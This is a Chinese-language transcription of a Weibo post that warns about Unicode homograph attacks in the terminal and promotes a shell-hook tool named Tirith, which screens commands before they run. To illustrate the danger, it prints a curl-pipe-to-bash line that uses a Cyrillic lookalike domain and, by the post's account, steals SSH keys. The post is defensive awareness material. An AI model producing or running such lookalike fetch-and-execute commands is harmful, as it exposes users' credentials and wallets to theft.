这是一张关于网络安全警示的微博截图，讨论了终端中由于同形异义字导致的命令执行风险，并推介了名为 Tirith 的安全工具。 原文如下： 爱可可-爱生活 【你的终端正在裸奔：一个肉眼看不出的字符差异，就能让你的 SSH 密钥被盗】 说实话，你上一次认真读完一条命令再粘贴到终端，是什么时候？ 看看这两行代码： curl -sSL https://install.example-cli | bash curl -sSL https://іnstall.example-cli | bash 一个安装工具，一个偷走你的 SSH 密钥。 区别在哪？第二行的「і」是西里尔字母，不是拉丁字母。浏览器早就回拦截这种同形异义字攻击，但终端连眼都不眨一下就执行了。 这就是问题所在。浏览器在十年前就解决了这个安全漏洞，而我们每天使用的终端，至今仍然对 Unicode、ANSI 转义序列、不可见字符毫无防备。 氛围编程让这件事变得更危险了。大家从 ChatGPT、从各种仓库复制命令，像喝水一样自然。我有两个朋友就是因为这种攻击，加密钱包被清空了。 所以有人做了 Tirith。 它是一个隐形的 shell 钩子，在命令执行前进行拦截。30 条规则，覆盖 7 个类别：同形异义字攻击、终端注入、管道执行、配置文件篡改、不安全传输、生态系统威胁、凭证泄露。 所有分析都在本地完成，没有网络请求，没有遥测，没有后台进程。正常命令零输出，你甚至会忘记它在运行。只有当它救你一命的时候，你才会想起它的存在。 安装很简单： brew install sheeki03/tap/tirith && eval "$(tirith init)"